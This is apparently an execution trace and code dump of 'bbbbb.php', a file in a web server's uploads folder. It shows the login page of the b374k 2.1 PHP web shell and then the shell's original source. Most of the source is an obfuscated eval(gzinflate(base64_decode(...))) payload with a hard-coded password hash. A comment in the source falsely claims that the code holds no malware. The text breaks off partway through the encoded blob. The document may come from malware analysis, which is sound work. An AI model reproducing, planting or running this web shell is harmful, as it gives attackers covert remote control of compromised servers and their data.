2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $xbind_c = 'dVJhS+QwEP0u+B9yFW6Ttex2BT/1erCcCiK3B+oXUSkxSe1gNylJVl0W//tNmha0KrRJ5r2XzMtMDkCLZiMV+eW8BDOrf+/vHbzDLOjHMbh1c79tlfsCd0Y8KT8itPKA/xz0iFDW6pgStCdrDppy+yhSHJ5ZBEOc7++JmlsynQYi30UmpKpkSrR6qSRK0OtGRJhLaUvQxKq18Qo5qGhl7BNlpChIxggeEbmZA11WfA3NlhRkeVaer06v8w9sa6xHrvZGO8q9geDx+XZxz9hHYcg6c93U6xt6vlqenFyWy9VNEEfLSMYy0T5fevXvz0V5dX15uvybZiz6/RHFjLRYJWNp0k13Ogn8A2hJ+wLQ0cXJlP2MrlKSvS668xpwXulhx3GAXmpoFF0wLEVXwYILoVo/aLJoRG7aI9rxn+LFKD4KsXpVoqHJHA3OXZ2kSRho7B7rThCNcSpuCeHb8IWWirrlzvXyB+7wBnGttFdWSda3HnAj9pNCkeUQHmmDlxs0'
2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $xmulti_py = 'lVNda9swFH22wf9B9R4qk9T56PYS0CCMlJYlzWgyGHQjuLZSizqSkZS2+ffVvbKb0GSM5SHWx9E5514dfTrrbY3uPQjZ4/KZ1DtbKhmFYlMrbYkyXWJ28KfyJ267xIoNj8LZ+NdqOrllg/7wcxQurifTKYuR4yEzJbnI4yhc3swmq/nPJbvs96Pwx/xuyWK3fD1f+EHB18SUvKpovimSURQGplyprWXKpLWquaTI24lJ3AFEqnlWVEJyQxMHlg0aqIK10kQQIYnO5COnlTvstxMkbsEd5r/34o9b1dxutSTNnjeU5VYoSXMlJZ58KUXFyVJvOfJYvcNvUDtHDFDOVf5Mm36Ar4C/5ry2DUwLaWnMtVb6t4xxv9UFUsRXxpMHwInlBKcKAsnkYuALQnCHwZovxv3EmgADi0dFHjeoj2Igt8eZ4iPuKnNuWmDrC6nBAjj42m8XA2j//gbbVeyK4bKg0P8ozPTjM3MZSmHgguWpYJIwNgQyzAYs3A9cKWjw'
2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $wmulti_c = '7Vh3WFPZtj8pkEASEiQISDsoCigdRkCDJAICChIBFQtCGhhNMzmhSAsTUEOMxq4ICg6jjgURlSpFcChWHBsKKDrohRvaIBcYUc8NI3e+Ke/73n/vj/fe+r619lm/Vfbae/+x9zphG9UACgAAtJZhGAAqga9EBf57kmnZwLraALiud9+mEhF63yZqK1cCisTCBDGDD7IYAoEQApkcUCwVgFwBGBAeCfKFbI4zgaBvO5ODHggAoQgUYE+zCPtP3h6AiMIhkN4AqFVIWhYBgHrfzISFM9VN48ivdSNm6v+NSmdivpq1BM7opN9x0h8Xoc1HQQD/47SWHu3624foDwUh/7a/PVo/t/8s47f1z/q7H/Wrn/vviyuc8SH/za/Bw9nVa3pyG4IeUp9qnPRJj3lrQx4bAMQGWg/tqdgigPDWOBheq3gnH8AWjTCoQBvcE68m9g5W1BMiSZ4taFu64aw+BGBINqgZTKpBY/R4aIO9qsCRFu2cigD+EH/KllQEutq2'
2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $favicon = 'AQYD+fyJUE5HDQoaCgAAAA1JSERSAAAAEAAAABAIBgAAAB/z/2EAAAAEZ0FNQQAAr8g3BYrpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAphJREFUOMudk8lPU1EUxvkbXAMdXlug2Kp0eu8ViiUIC2wZJJYqkwUqFiqUMjqgAQppUnAIiBKmFoq0thYKBI0GBGMw0ejGxIVLdyYmYDQ0xPD5HokopmXh4kvuyb3nd853ck8cgLhYylymkblIadlzxmNVUXpAuf3vmwOB9pma+DvWhElkhFRhy4Cer/YpaugZ+bdDASfZiktU8+84PaiKqP3Kr+YbOd6CXnqbHpPtltjUzpgAzQK5mTFPRvZaDpBb9KwClFcOyi1H53oT1j+H0O6qgK4mrSUqgPGpTX+khMZHbuYFTiH4YRxPPk5j4KUDklvJqFjOh//1ME70H8VxZyqkDjFTdZ7cYnzue2d87mZ6Kcy+u42epyZcDZegNVwJ'
2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $style = 'tVbbitswEP0VwVJoYR18SdNd52kp9AtKX4tsybFYWTKysknW9N9ryVI0sZ3sFrbWS+KM5nLOmZkUkpx6VODyeafkXpD8LrbPFlVS6KhjrzRPkvbovle4YfyU/8S1bPD9L6oIFvj+STHMt6iUXKr8rqqqLfqD7hrMxKXrxD5b1GJCmNjlaXtED8Z31MjXqJCKUBUpTNi+y1ESm18WXx4Y0XWexPEnG6imeLDpUYPVjok8DgGGj5oedYQ524mc00qDC0iTK3eCSZ30AIjURgeG4XZ0oMUz05FWWHSVVE2OlNRY089Rkq2yb4Tuvrg6b5vA2Aj3AFSHa3i3/v6QPf1wJRJaSoU1kyIXUlBjuTKOmKhk72E0COQDm6iTnBF09uDq2MDyDDnxcBL71nnTBe8n8Pv3HdIDBzVlu1rn6dpceqFKsxJzh3/DCOFjZjt8wvdo9WJom1Rj4T6MbgrJibW3hh+GMadaD2h0LS5dpaNgqdgvC9bzjAwoQ2nIXVmZKw1D'
2 A /var/www/html/uploads/bbbbb.php(12) : eval()'d code 2 $sortable_js = '3VrvctvGEf/OpzixqkiGJCg6SWciilIsW5lo6jidWtN8oGjNAThSsECAAY6i1VgznT5GP7Zf+xTJm/RJurv3BwcQpKU07WQ6Y0vA3f753e7e7t5BdzxjubzIL87ZmA0++TIIrtNk78tPBjMe52LUyNNMSu7HAqZ/aLAoieQRm62SQEZp0u7Q2Iy1eTZfLUQicy/gcSyEF6aJ6LBMyFWWjBqsdh5EymwFSkjEtYwWIuuwIBY8u0ikyO54bEZHTBHthWlAgrwgE1yK81jgG/vwgRVTcyH1eH52f8nnr/nCxWKX5L18fnl+/Uda+dv2VXgVnnYmV4Mrrz+tvNFr55R+7g9AxizNznlw096ps90iNa1Or7AYjVizKRhBzPMcGbwclg5SB1c+gsTJK3/QYXtj1h92HOALfiveaAotEkA90I9eA2zlEhzt1r4F+Y3gYavjxSKZyxs2HrND4oNxMFe9FyzXiOg8vlyKJHxxE8Wh1pWl63xyOCUCGoiSXGTyTIA9'
3 10 0 0.005554 893136 base64_decode 0 /var/www/html/uploads/bbbbb.php(12) : eval()'d code 331 1 'tVbbitswEP0VwVJoYR18SdNd52kp9AtKX4tsybFYWTKysknW9N9ryVI0sZ3sFrbWS+KM5nLOmZkUkpx6VODyeafkXpD8LrbPFlVS6KhjrzRPkvbovle4YfyU/8S1bPD9L6oIFvj+STHMt6iUXKr8rqqqLfqD7hrMxKXrxD5b1GJCmNjlaXtED8Z31MjXqJCKUBUpTNi+y1ESm18WXx4Y0XWexPEnG6imeLDpUYPVjok8DgGGj5oedYQ524mc00qDC0iTK3eCSZ30AIjURgeG4XZ0oMUz05FWWHSVVE2OlNRY089Rkq2yb4Tuvrg6b5vA2Aj3AFSHa3i3/v6QPf1wJRJaSoU1kyIXUlBjuTKOmKhk72E0COQDm6iTnBF09uDq2MDyDDnxcBL71nnTBe8n8Pv3HdIDBzVlu1rn6dpceqFKsxJzh3/DCOFjZjt8wvdo9WJom1Rj4T6MbgrJibW3hh+GMadaD2h0LS5dpaNgqdgvC9bzjAwoQ2nIXVmZKw1D'
3 10 1 0.005583 894448
3 10 R '�Vۊ�0\020�\025�Rha\035|I�]�i)�\vJ_�lɱXY2��I���k�R4���\026��K��rΙ�\024��zT��y��^��.��\026UR�c�4O���W�a���ĵl�/�\b\026��I1̷��\\�����-���\032�ĥ��>[�bB���i{D\017�w��ר��P\025)Lؾ�Q\022�_\026_\036\030�u���\'\033��x��Q�Վ�<\016\001���\036u�9ۉ��J�\vH�+w�I��\000��F\a��vt��3ӑVXt�TM���X��Q���o�:o���\b�\000T�kx����=�p%\022ZJ�5�"\027RPc�2���d�a4\b�\003����\021t�����\f9�p\022��y�\005�\'�\035�\003\a5e�Z���\\z�J�\022s��\b�cf;|�h�bh�Tc�>�n\nɉ���\037�1�Z\017ht-.]��`��/\v��\f(Ci�]Y�+\rC�\031���t�ƄA�?}4g'
3 11 0 0.005642 894416 gzinflate 0 /var/www/html/uploads/bbbbb.php(12) : eval()'d code 331 1 '�Vۊ�0\020�\025�Rha\035|I�]�i)�\vJ_�lɱXY2��I���k�R4���\026��K��rΙ�\024��zT��y��^��.��\026UR�c�4O���W�a���ĵl�/�\b\026��I1̷��\\�����-���\032�ĥ��>[�bB���i{D\017�w��ר��P\025)Lؾ�Q\022�_\026_\036\030�u���\'\033��x��Q�Վ�<\016\001���\036u�9ۉ��J�\vH�+w�I��\000��F\a��vt��3ӑVXt�TM���X��Q���o�:o���\b�\000T�kx����=�p%\022ZJ�5�"\027RPc�2���d�a4\b�\003����\021t�����\f9�p\022��y�\005�\'�\035�\003\a5e�Z���\\z�J�\022s��\b�cf;|�h�bh�Tc�>�n\nɉ���\037�1�Z\017ht-.]��`��/\v��\f(Ci�]Y�+\rC�\031���t�ƄA�?}4g'
3 11 1 0.005714 897520
3 11 R 'body{ background:#000000; font-size:11px; font-family:Tahoma,Verdana,Arial; color:#fff; } #main{ background:#111111; padding:2px 8px; -moz-border-radius: 10px; border-radius: 10px; width:100%; } #header{ margin:0; padding:0; text-align:left; } #header td{ margin:0; padding:0; } #header h1{ font-size:20px; padding:0; margin:0; -webkit-transform: rotate(-13.37deg); -moz-transform: rotate(-13.37deg); } #header h1 a{ color:#ffffff; } a{ color:#4C83AF; text-decoration:none; } .headinfo{ border-left:1px solid #4C'
3 12 0 0.005757 893248 time 0 /var/www/html/uploads/bbbbb.php(12) : eval()'d code 385 0
3 12 1 0.005772 893248
3 12 R 1676251163
3 13 0 0.005785 893248 date 0 /var/www/html/uploads/bbbbb.php(12) : eval()'d code 385 2 'Y' 1676251163
3 13 1 0.005855 895640
3 13 R '2023'
2 6 1 0.005879 895312
1 3 1 0.005914 636552
0.005946 521248
TRACE END [2023-02-12 23:19:49.438376]
Generated HTML code
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<title>b374k 2.1</title>
<link rel="SHORTCUT ICON" href="/bbbbb.php?favicon">
<style type="text/css">body{ background:#000000; font-size:11px; font-family:Tahoma,Verdana,Arial; color:#fff; } #main{ background:#111111; padding:2px 8px; -moz-border-radius: 10px; border-radius: 10px; width:100%; } #header{ margin:0; padding:0; text-align:left; } #header td{ margin:0; padding:0; } #header h1{ font-size:20px; padding:0; margin:0; -webkit-transform: rotate(-13.37deg); -moz-transform: rotate(-13.37deg); } #header h1 a{ color:#ffffff; } a{ color:#4C83AF; text-decoration:none; } .headinfo{ border-left:1px solid #4C83AF; margin:6px; padding:2px 0 0 16px; } .headtbl{ width:100%; } .headtbls tr{ height:24px; vertical-align:middle; } .gaya, .ver{ color:#4C83AF; font-weight:bold; } .ver{ -webkit-transform: rotate(-13.37deg); -moz-transform: rotate(-13.37deg); letter-spacing:2px; } #menu{ background:#111111; margin:0 2px 4px 2px; } .menumi { padding:4px 8px; margin:0; color:#ffffff; background:#292929; color:#4C83AF; text-decoration:none; letter-spacing:2px; -webkit-transform: rotate(-13.37deg); -moz-transform: rotate(-13.37deg); -moz-border-radius: 4px; border-radius: 4px; } .menumi:hover{ background:#363636; -webkit-transform: rotate(13.37deg); -moz-transform: rotate(13.37deg); } .inputz, .prompt, .evalcode{ background:#111111; border:0; padding:2px; border-bottom:1px solid #393939; font-size:11px; color:#ffffff; } .prompt{ font-weight:bold; } .evalcode{ width:100%; height:32em; } .inputzbut{ font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222; } .explore{ width:100%; padding:4px 0; } .explore a{ text-decoration:none; } .explore td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; } .explore th{ padding:3px 8px; font-weight:normal; background:#222222; } .explore tr:hover{ background:#181818; } .sembunyi{ display:none; padding:0;margin:0; } #result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid #4C83AF; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; } pre{ padding:0 8px; } .phpinfo table{ width:100%; padding:18px 10px; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; border-bottom:1px solid #222222; } .phpinfo th, th{ background:#181818; font-weight:bold; } .phpinfo h2{ text-align:right; font-size:15px; margin:30px 0 0 0; background:#1c1c1c; padding:10px; letter-spacing:6px; } .phpinfo h2{ border-bottom:1px solid #4C83AF; } .phpinfo a{ color:#cccccc; } .viewfile{ width:100%; margin:0 0 4px 0; border-bottom:1px solid #222222; } .viewfile td{ padding:2px 4px; border-bottom:1px solid #222222; background:#181818; } .viewfilecontent{ padding:11px 8px; } .mybox{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid #4C83AF; padding:14px 8px; margin:4px 0 8px 0; } .mybox h2{ margin:0; padding:0 0 8px 0; border-bottom:1px solid #444444; } .myboxtbl{ width:100%; } .rs_result{ padding:0 12px; border-bottom:1px solid #444444; } .footer{ text-align:right; padding:0 16px; font-size:10px; letter-spacing:2px; color:#222222; } </style>
<script type="text/javascript" src="/bbbbb.php?sorttable"></script>
<script type="text/javascript">
function tukar(l,b){
if(document.getElementById(l)) document.getElementById(l).style.display = 'none';
if(document.getElementById(b)) document.getElementById(b).style.display = 'block';
}
function init(){
}
</script>
</head>
<body onload="init();">
<table id="main"><tbody><tr><td> <div style="width:100%;text-align:center;">
<form action="?" method="post">
<img src="?favicon" style="margin:2px;vertical-align:middle;">
b374k <span class="gaya">2.1</span><input id="login" class="inputz" type="password" name="login" style="width:120px;" value="">
<input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;">
</form>
</div>
</td></tr></tbody></table>
<p class="footer">Jayalah Indonesiaku ©2023 b374k</p>
</body></html>Original PHP code
<?php
//*********************************************************************************************************************/
// b374k 2.1
// no malware on this code, you can check it by yourself ;-)
//
//
// encrypt your password to md5 here http://kerinci.net/?x=decode
$s_pass = "2cf1656ed3df6864df08feaf603ebe13"; // password (default is: kerinci)
eval("?>".gzinflate(base64_decode("7b1pl9vGtSj6/a51/wPDqxd1hy1hIDjAsuQDEuBMcB5AJ1cLM0CMxAzm5r+/KgBks5vslmwpdo6PnRU1WMPeu
3btqeYff3I193//r5LseY732ZNdxwt0W71D7z+U/suXg8+BbsmfTd3Sgyztjf/Z5i259LFUFqoNwihnSZHswRT8PZb/DvTAhGWK0u/LpfL7vFiWzYeBBnIV3
vTlDyVdufMDz5Ttu8DTrTuQ7/K+f3//Cb3/J8zUfUDH3ZvP7clk2Gd+fpvhffuP+zwXVA0c04ll71n10sePpavMayD3FwQFXgjo+dcl0jkzWzGL5c9vTUfV7
Rzrm+y7dAv8dfEPXyTSkmp3OUgIHKAVHcfQ5buCwQ8X+Q+wN+7uS5VStY6if8OJvzVgn1iQ1Z8XzHzNzH9+u2jP+9PlZ5YaM2//8aGkybwE8JZHjsgHumP/A
PvCAtVgo+/AXwnguofNlkF33CIgR37C/e574D7j/FeB96oX3iQCLxqfXbP0sSztOsqSGMed8VapzGdraxENmJA7HkSrzQ92Jhf30GRZYeL1SpijET+ydkmzM
RXMg80IXaRa7U0no4YUK9rOdyltY1KrQB9tjgZHpVsPp9saPl2gixlZOzqrTd1UHZ5gdVupsm1tRKrdyKSWykQ1ySUyF/B4NlBYv7sS6c74KIoTkuAqg/WSx
1oHbRE5fbW62CBRL60r5FAwCUOe7vmduZ0F7S6v6+vBUZs1170wwQ/DDbXVJrRuCFZlKIUx1pIFh6fqgq3usW5nYlLzrd3Vrd56J6z3PKXV3YNGHtZktCIW9
cHO7iOz5oHnRn6idozNxkU6hhdauLyby6LIqxWVRQdJnW1qHHeMRl59M2Sqw3DkBUzV8KKm1prY9WXFriBLoklF4/7GDx1xWjU3Au7Odm5lhn4sZ12h21LeF
cKuEy2a45gZC0oNm4qcJ2Or4V5PMTeROtteYHPoek4jJmvLbEdfohbvHKf2bsm5S0aqdGrVxrQm12vRrl4VtCiy1TBKDpxuWrFGTfywydmd42G6Gw1bkr/Fj
WnIeGE9QOLRtOoY21DotnqkyBpHbTfHKSlaRHiw85lKl1/bZpViWnHNpzqVmq82xV5DYCwD4zr+ttY3rGNMj2akUg+WJBdQ7rTDpB4pS1h/MAt2rVnFCSOFt
DC14hyx1XyJoQo7wJ1xVYzlPmo35/OaWuMYo3Y0D9s5P6lVKglGKIS8cFA84TfzY7+uJs5xUNns/O5oYJvJwRX89nzqxP5mLwp7jN0cGQ+rH+YMPWqGaSpYs
RIj0dIa0rXDlEgju+oQh2rb2YbiSPUoct2K9se0ba+4HTPZzLlOfU+3B1xNrG1FjsTrbq3LJ0azMuPc3qSzSLsGpbOL8aSHL8wkURcrbtMKzP1swLFugxntU
d7qNdA5GodjV5QRbLNnp7hJ6P5mW1GaQm2jG5FT0fYrZ92gIyOt7hS1X4gA1EYRWvntusPycT9hRugIcSRN2w0csYNHuDPstxZW4NiBt1tbS4GW0OViMUhmS
LOB4ilmOtPFRrCirQGEccG47GYizlU+JZYH00DYeRhG0r6drJTFCD8GlKhHos6txuqA2rCeNUspuYYcZgw/MD1+FBGVKt5ZHjcm12etGNNJJ+GbwrjOHZ0Z0
6/P6M2YqC4OQ4Ycte3Jxqz6+kjRJw61P7bqx8MuMpBZF9fdoLdu8YNZdejN+86eCTaVjkDRFYtv0npaPXoMK8hIM1hixibCNmkrjDlvNCRrg4knr/Wq17I7W
kALrj+3qFq3QQKuzZKugC6sccPWMaOekqOk1596DLVS54PNyu64qzE1co6q6XBVLe4mUzupdT1Ca/S6FNmojJbmRg9ZJ2o1U0qdAqXhakzcmMRkFa8SMzqpy
X5lrmCRuKtWWd5ZaHI7sYSxPpxHGE3yRw1FUWfX0NymMiVajxqcdZ+0HmiLyixmpmhYaZFpZ1NfBnKCt5YIJnttsa0Pq62Ks10tjGQhYyqbmoO1iW4QJGAtj
UcBnwY1D98ex8GYNtqjnT5eV+RNs0VPPKUCDJ9wpEeTfW8saJjYIANT8dsSyjWHy6YeTIcUkhxRvUNv6q66CNqSR7tuWkm1RW9Q27WYidioVAaW6af2jNOr6
Mpyh66x8Ob1w2I+RCdBdz7QRvwqmiXDA9acObVDVzMbLdZ021o/UVWZEawdhWEbhaqypjY35DUve2g9asakz9eTnhftupPmgVRlOqlsd8mR1HqcqNZFsrqqJ
0E9Mg+y3Uk3KblmGUYZLcZcii5rihxtoyO6rklbrBZGqbDTj3Vk3uvsR3NusGFd1MCqE9VuUrg2qMSjGSpuB+YUH3vmcBEt6vVm4sbb0NSSapfaWq7T6aDxi
FlvY64/ctYOwo8Gzrzb4Pukl9iVUWdIE0N/666dQ2/Qo6qT7Q43FnPNabQa3lJrs+LCDdtyT2j2Nxvd88xjtE1blUbcsrtB0JE2C4mv9mxqT7ps25BXs55l0
Wbio5N5LBPhdCett368Dgm6hivViTFYhWQrGQ0GyGG7UQ4iK+hhu6cMNl4n4rtzPPURykDGu4Ohbk0l/phbBSs0A/2zm0LBMtesxJN+3OnheKyQLXJOHAxyW
atPuQXabo/NAWceN2ra7c324Wi30I+HhbFb4BVFWUfCUEC7i3Ft0dskJFOrYYSkLD1P4KrhdLbfEchwh9GBMNSsDmeOQbqRbjcDvDlU0gFebyR9h903R7sKK
x0mnmmqSCMWk1no6cpyyIVzImWOA8HuE6kmVv3YOiD2dCBEPlmfxgmShOlmWFVoTKkwvRbWXKyioetEurVYzWdd10xdb7MduqPNIeSXfZwwB1Wqwxxsc7NmB
uksGfdMFeUP/SGGGrNZn7MntfbENpeRHyRjQ/AZqeYhVcIhBUxKwmCxZO29vKqtOWexBWzZ1ZrD1baTrgfRRBlwkchGKzro0R16slZqY6tapzyijdS8FKdX8
Yjf2ONgLdQDIkkictVZ+fNt4o57cd82W0NxSPm2wYXUaGa3e/HOiZKoylgqReuo1OntZWeP99WgKe8IfRoObTbcWLTXrtstar8ncKu5pfA9gqiCsJbTISEMV
XTaBC58uR9Xx7uF1VPVcONyg37MqrP0SHF+lSLF4WYfU0CDacqI57QqEaptm9PWlpMNlef7XYWTWqrjhKtDfb88zmocriqNdrvSQDgN94/2BFkp4G93XQ8Fv
Gmly22lbvWQRmQ6fiMV9pvtdNLZeNpC0Bb8PCJq3cVc73GRO6TRqDOord3tEJ+Ow9mOHbTrOuPLhIqzAyFVUqwyb9cnSlvkqUaX2eMW2kvlDXrQZrFiIChhr
gcgLosmvGLYsghEw+sZqz5FNRpNhsJntLLYi17bxVSGHPutdFuv1g80WveITh859Jx6/4hZtYBb143tnKj1Y5SsjOs9H2imrylzGqssEbULlSXOlSUzwo21V
t10prtg33QNhlow+qy/oH2nravS3GjTA6rfBvas1YFRo6ax46OlLSh/uWIm4+RA9Ntqfb9XV3Nz4XbEtrbptfzhkPYcbR7x/ZbIrcQm26/KlaGMNKo2Eu0RR
a54dYw0LWStCLyMVBLy6GpdckW1VYoKBjutS1EHlSeZllJrGJa9i0ceT430UCIrFqN16tV0dxhiwD/4y3aL7tJ0o89RDjOjXENcteO12olb3RYlt5VhR+gTR
5VvRZPahAYSQzkzdcUxlWN7GkyrWp3Sx33NYAnq0Fn3NxrXUnuecuwvOmNgdImmHkkL1qpHFXZhSXrkHrDWuOG4LJmgWnPriFhvNqMRorHY9MJqHScUh45XG
tLgkSkwpAHS9ImGgh2RQ6OHbDzQ/EhPQ7G56CFHHmnFpL3mq27aJfryyiUP9nQ+2FdNb5YQAjWedTcqEhwkVVen9GbS0uRDVbV7TWqzX7adWSsSmXrTItXaB
hClL3ZEwHfCOsHHFdD4PntQd8uh2+KQOcH3J+QBxH+dEBd1lQamBRma5owJgwPOsR1n4nP0gd2spiSFxWJTQZuburEg1hwnLok1kEZKcBf+AHOFbhASQyY52
kMZq4x3JHBJlC4cN8RBmS+d2rpSEVoJ1anjQ4odr5ZbNhqmsTU4uBqFjkcuUB5TJtsd3SMXCp8i49ahukf3WD1o81WpHiVUd81SbWpQ0+m1LKx1FlEdXBkDL
O3G9lBxBtWwCUx2PZ6Pgmpbt7vpWGsJe4QiOVafBex8CwitjDfLGm9uWK2+JUUrZRdgEIIYs4q+aFkxsdwlg3jUHcndZWMVRb4WGUelww4HrlZn2MiQsOMWn
S63uCvrGOk0bO1ATEhK3dY3mgd8Lrk/rHi1vzKMNXMAgrGkDq3RCNejBidW3WGqHrHYqh6jWjDvNMWdZR6OO4fGZ6PZelLdRjV7TXAaxq8bNmpblMHuox6xm
wW2x+MbmqF7Y7EREhh/ZHAXmxxGwDI5KnHsLeUOy7AHrofsjjU+2nNGa+H09wY77oZrtHvoCOwaGwT9SruGzhYHu97ZezJ5tBvykZSPotDgsDVHIAptg4hkO
hWnxzop+/oQUSa4tx3XSVFKV0h3yaI0jQUjEMwN5+a6JdrEeudaCBFtenqq6AOeFEQn6bdGKBowkn6I2GZ36x6N/lA0KqRN2odelZbCUTqkt61lrAcLk+83l
OnR4Vqht6oI+8WaNkkbDTdTm8KnUqpqGGJoiRM3sRDtMbZYTQK6taf0rcDKjFZv8KYirET+QI3IWFvN271xWptqKnKgO0FI40QXGR6OFZU7gvCiwazAwCaKM
JJbVDCO8rHJGpn2O1uFCXp62O+I+NQ5kCSKYy1dkJoHKSbY1g5phNtuJ8WmZoW3e40tJdZ6NrmuWm57rZsBcOUMJ48mqheyS2dqd5UJXydW3IFc+ItakjDH7
XorYobXIDBpX019Z+ZLQeN4GGtem0U4ICY9oUrTeE8x8XgxX4o1yXbillzp7evhmtm4QtAaeQuusmW15qhKTzpVbYoAo7CbzeU6X3Mq6/aY76FLtYGmYmtA1
pDB7nhcLkMR72g2rRqzabStpOwk6PPavGENeJNGENvc9g5Jsm+zW8w0EQttcBbWIgasw89lM6gbY1yajuaL8ZhqJHGtUquuJ1gc0XN+bDM4u7WBsdT0iLYEv
zc+7jy6PqLlKdps8gtPqNQw+8jpNWTTZ7UOglDHud9quckUb+5kp2aKc9OXAw9fBYHvhWNjM+9YHKfxJu7R6wG1sBANEdiK28XX7HiXjkdtdWFPp5sYEUlaH
/jTiD9Gy4kb9XmH4Gohnow4zNMOmDD0gPegcYld7uykUWlO8VZV9/f8UYk6U6eVsCOpQpBsd8712BoqTncNKXDmrOiswt5yzA3SeXvQnwq+4RzwmrxY7YmFL
FebfjtS26NFuwmAbmoty2DRPi5i9MptdA4rM94N6+GwtlbZSYVLlHWvRnBSDWUbZiwYVTyeSo4ROrVE8KaIKS1JOxyRaF8wO/P4uGKJTtxWNq2Wx+gY4XLVY
NGg64SUzvfDhjNv6+HObhx2FQ1bBzNR3+xne2/arKwtS0P9SCQqsqwPpxpS2UTjnWxPuWZYr6yagb7123YsorNJhY+WB36IgTih1ebHAHatUjFNfC6MjlvAc
NcdMXVdCCLR29e7gRzvm7wFhkK72sTc9fQImcdR2kHsldba1aJ0Hw847LjjXSesd3HN3PATO5xT2+UEn4qbjYeb9bQhTI5Ec4LM+Gqls+p4rik7HUTFIoLeR
0MJJ0Qp8JqLYzxThjVprzFDurnZMftaSgVHaZe0xxbiLtozlEA3vrPp+kfB5vlRS2txu54Xt5JggZlgoNCrjSzaraV95iDH0tDeIaMgig6uijeV2tqxViN1I
AXEKu2Ro+FQErsqq5js2ECPC6F7EEyCopk+Um1VK6GZIKO1vxjPV4bdEZur+q65ousrZqcsNw17uECN9qCHtDy+g67R/WTTVEFgaCu1pLLG9d0ixPohDUKla
DJsL4WWgqPOUZdHi/oAr61UTGA8qc2FScsdS5yaDresQ4zRGYs3JhV9VvPVgdchkcawVWmuq9O1gUTHJgjWxJBMDG1fPRwEyWuRjGhj8k4yyG516uBhtLZ3O
GaucHSYimjH4PS6ZRzmvd4kMSJ6S2H+ceqbAsHpQl8+Ol1z7buREIbsommwnjAfyO4gdSecvNZwj5143V1zZ83QMHXd2JC3m5oeLWRxv+cj6iDtEzBSNVvd5
kGY8oS/4O1lqIxStddwZ9Up5vdB4yrVem/fc2tDjZtHHhjCOrM1Jw+7QTodDsFI3jSVDb9M/dqcbA1bwA+vR95Q5fe9eeNgeG6jv2zuZ5slsYyRGAxo65vag
mjUp4pkS13gBlTF7swrhubRNabrqTFro5hc27Z687XZ9pYHbRMEDd3G4nGns6yhy2FwmKnj4biq91dOAyiUNGnMiBHb22xlzqcjncMqkesvVGkyJWaCtqGlh
TI6Hnx/jvQnXULftTEJI9ZbVCSXs81YHK6DTn+6qaairzQje7A4kquN09iZzLEVLq1tHQ87HSJZ2eqW4bY6rlBqoDQW5FCodSZGzQ8a6rFuy0LQdZc8Np+J9
aGixwOP3esywZEzw56Kg8Nq38LSsHekbG7KUpP90A3XvUmfGATWIaGdbRKhtcOIQNqTJeFgXQ7biyvV2HWQ7dQmaQo5MOLAmjeGUzkaRUlNpmqjnnbw7EYTD
BWMMRbN6QOq9ird/uoQ9iTUHHTVQ8dkqzHTG4XHsXqIiC2w+eagcpwf9dYyWmCWNO1h9KJiO0HD26AmMlzw7LyZ0vWQkSWv3e2FlNSe1sSKuBOitBKm69WUm
JOaOedUq0ft6A6ech2sWgcC2QFeD3X3yGwgVBOtOV/xg1ib7tiaS9aGo6aMNCsiSx+rLjdchfvEbTanDIau6RHR0L3+lkvWjcFUSrBps7oaL61AqVRaS6MWV
OTBsUtMhkTV2U/TZpdL1+vdngQo27hmr8fNfnd4aCqxGy4laRKCATtjtY6hsAXuDt3wfk2Mx/UEDNAc4rhrKL7JV1pyIluHcX2FJgpbW3COUW/S9UPcaE4Cu
z1RyIOJSuyOrwyQSqN1aAZqrLYBSxedZpMcy7ZDNpn+qB0oulA/oO0OKXlWFHWdo7meT7ZR0GdHwvIQjZhwYMgH8bg5Rviw0pFdzJ8MzeMOI9ujiVLrIi1SF
rrbyoINaNSwaz1N44ytMp5Jy1nDtitkDwQYBC0f65Ldqm2H5pRB52zHT2htTQzF0brip42tPDArBLXbC5WtIPnyEu/QQymVU8sUlqw2cC1bxUb6pjYjp6HkJ
BUtEBb4yLaYqtBDnNGYWA8TcQ1GDgeiNxmAkBAMQY/YblVN++42SJachSz28tpt4HwnOPbjhiKOq52o5e0J309ktJ2Qe4XpH5up4ToJOlZpm7LYBV8brhtNb
7XYVnVy046kI4YMMd/bxE0pWltObzXCtmyIH825WG2IU3lEe5xalaeaEQ8XWKVv0KJmuD1tNWYbi/nBNEg+ofvt4Jg2m21mzmjGBleInrZot9txIrV7dHvRR
xuGv1cX436sce2lulvX1YOybpOd9DAK3WYdSeQJ8BeqL5kDr40nq4Mo4dEep2OZGfnpeMm3jWZ7PWulyZRoasaWMuZjaShGNWuEjffribBqtk17l8hGsA+ps
JdO9KbWSjWuri/tuE8fO0xjKG4kwQu7g34atgOD4w11yo1ZM/J5lmjRRH9ktYELS6Vet4tMpR7Vn+m1id05NLXK1qhzSSwe7fbY6XvcsD9apHq/lvKESONNq
GRMpIkzbrjctX26pjb7lU1ssyqr651k33FaR4RbL3pmxLW55qjRpme91uA44cBYeUwRLc6j+iDSxChljZg9ldNaTFsxjzV5YpISPln64URt1Cua0E22TGun9
klMpzCjnYZ6JMemQidenTxKcT3aqb4lqQPW5MdaihDAibDErNPi04mvumNWdYc6PT4uzHQn74eTda/FrOrHVNwlXMUnq/3mul5FRuOK08F8bThZif6hvU6gp
xHrwCB3ZpRYYffHBt2L+glpJl5omssEd018lpBzmeXEkazXuF4nZrsIbw+ZyoaUMKUR+15PFjv8cjT3MXncreJbpqek0ziYmNYGDEdr6HHsew3dMDz8YOyCq
mT7jbq5VdKBNDkigbnpEy4/QSZdrqaPOoe+7/fYPRHTythvb2v0PmAxrsqYC7LVWS2SFESnk0mLIdTjcX/ocUoUW5uUnam8heK01kv5qLanVRrEdQKF8vOJO
